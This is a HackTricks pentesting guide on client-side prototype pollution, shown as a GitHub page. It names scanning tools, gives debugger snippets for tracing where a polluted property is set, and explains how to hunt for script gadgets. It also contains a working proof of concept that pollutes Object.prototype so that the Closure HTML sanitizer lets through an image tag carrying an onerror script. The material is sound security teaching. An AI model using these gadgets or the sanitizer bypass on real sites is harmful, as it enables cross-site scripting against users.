Skip to content

Latest commit

 

History

History
137 lines (94 loc) · 9.1 KB

client-side-prototype-pollution.md

File metadata and controls

137 lines (94 loc) · 9.1 KB

Client Side Prototype Pollution

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Discovering using Automatic tools

The tools https://github.com/dwisiswant0/ppfuzz, https://github.com/kleiton0x00/ppmap and https://github.com/kosmosec/proto-find can be used to find prototype pollution vulnerabilities.

Moreover, you could also use the browser extension PPScan to automatically scan the pages you access for prototype pollution vulnerabilities.

Debugging where a property is used

{% code overflow="wrap" %}

// Stop debugger where 'potentialGadget' property is accessed
Object.defineProperty(Object.prototype,'potentialGadget', {__proto__:null, get(){
    console.trace();
    return 'test';
}})

{% endcode %}

Finding the root cause of Prototype Pollution

Once any of the tools have identified a prototype pollution vulnerability, if the code is not very complex, you can search the JS code for the keywords location.hash/decodeURIComponent/location.search in Chrome Developer Tools and find the vulnerable place.

If the code is large and complex there is an easy way to discover where is the vulnerable code:

  • Using one of the tools find a vulnerability and get a payload that will set a property in the constructor. In ppmap you will be given something like: constructor[prototype][ppmap]=reserved
  • Now, set a breakpoint in the first line of JS code that is going to be executed in the page, and refresh the page with the payload so the execution is paused there.
  • While the JS execution is paused paste the following script in the JS console. This code will indicate once the property 'ppmap' is created, so you will be able to find where it was created.
function debugAccess(obj, prop, debugGet=true){

    var origValue = obj[prop];

    Object.defineProperty(obj, prop, {
        get: function () {
            if ( debugGet )
                debugger;
            return origValue;
        },
        set: function(val) {
            debugger;
            return origValue = val;
        }
    });

};

debugAccess(Object.prototype, 'ppmap')

Go back to Sources and click “Resume script execution”. After you do that, the whole javascript will be executed and ppmap will be polluted again as expected. With the help of the Snippet we can find where exactly the ppmap property is polluted. We can click on the Call Stack and you will face different stacks where the pollution happened.

But which one to choose? Most of the time Prototype Pollution happens on Javascript libraries, so aim for the stack which is attached to the .js library files (look at the right side just like in the image to know which endpoint the stack is attached to). In this case we have 2 stacks on line 4 and 6, logically we will choose the 4th line because that line is the first time where Pollution happens, which mean that this line is the reason of the vulnerability. Clicking on the stack will redirect us to the vulnerable code.

Finding Script Gadgets

The gadget is the code that will be abused once a PP vulnerability is discovered.

If the application is simple, we can search for keywords like srcdoc/innerHTML/iframe/createElement and review the source code and check if it leads to javascript execution. Sometimes, mentioned techniques might not find gadgets at all. In that case, pure source code review reveals some nice gadgets like the below example.

Example Finding PP gadget in Mithil library code

Check this writeup: https://blog.huli.tw/2022/05/02/en/intigriti-revenge-challenge-author-writeup/

Recompilation of payloads for vulnerable libraries

HTML Sanitizers bypass via PP

This research shows PP gadgets to use to bypass the sanizations provided by some HTML sanitizers libraries:

  • sanitize-html

  • dompurify

  • Closure

<script>
  Object.prototype['* ONERROR'] = 1;
  Object.prototype['* SRC'] = 1;
</script>
<script src=https://google.github.io/closure-library/source/closure/goog/base.js></script>
<script>
  goog.require('goog.html.sanitizer.HtmlSanitizer');
  goog.require('goog.dom');
</script>
<body>
<script>
  const html = '<img src onerror=alert(1)>';
  const sanitizer = new goog.html.sanitizer.HtmlSanitizer();
  const sanitized = sanitizer.sanitize(html);
  const node = goog.dom.safeHtmlToNode(sanitized);
          
  document.body.append(node);
</script>

References

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥